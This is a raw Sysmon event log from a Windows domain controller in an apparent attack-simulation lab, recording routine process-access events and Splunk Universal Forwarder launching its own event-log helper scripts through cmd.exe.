13:12:09.503{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004066Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:09.503{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004065Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:09.503{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004064Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:09.503{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004063Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:09.503{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004062Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:09.503{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004061Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:09.503{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004060Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:09.503{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004059Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:09.503{08A6967A-4286-6000-0500-000000009A01}6361144C:\Windows\system32\csrss.exe{08A6967A-4329-6000-DD00-000000009A01}4880C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000004058Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:09.503{08A6967A-4325-6000-B900-000000009A01}11763032C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{08A6967A-4329-6000-DD00-000000009A01}4880C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7d35e7|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7cdcb9|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7ca4ec|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7ca0a3|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7c9f0d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6d7908|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6de2ee|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6b29fa|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6b4274|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e42dc|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ec682|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e9959|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+d7f31|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000004057Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:09.505{08A6967A-4329-6000-DD00-000000009A01}4880C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c ""C:\Program Files\SplunkUniversalForwarder\etc\system\bin\WinEventLog.cmd" --scheme"C:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000004056Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:09.378{08A6967A-4325-6000-BD00-000000009A01}30161356C:\Windows\system32\conhost.exe{08A6967A-4329-6000-DC00-000000009A01}5008C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004055Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:09.378{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004054Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:09.378{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004053Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:09.378{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004052Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:09.378{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004051Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:09.378{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004050Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:09.378{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004049Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:09.378{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004048Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:09.378{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004047Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:09.378{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004046Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:09.378{08A6967A-4286-6000-0500-000000009A01}6362368C:\Windows\system32\csrss.exe{08A6967A-4329-6000-DC00-000000009A01}5008C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000004045Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:09.378{08A6967A-4325-6000-B900-000000009A01}11763032C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{08A6967A-4329-6000-DC00-000000009A01}5008C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7d35e7|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7cdcb9|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7ca4ec|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7ca0a3|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7c9f0d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6d7908|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6de2ee|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6b29fa|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6b4274|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e42dc|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ec682|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e9959|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+d7f31|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000004044Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:09.390{08A6967A-4329-6000-DC00-000000009A01}5008C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c ""C:\Program Files\SplunkUniversalForwarder\etc\system\bin\MonitorNoHandle.cmd" --scheme"C:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000004043Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:09.143{08A6967A-4325-6000-BD00-000000009A01}30161356C:\Windows\system32\conhost.exe{08A6967A-4329-6000-DB00-000000009A01}4972C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004042Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:09.143{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004041Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 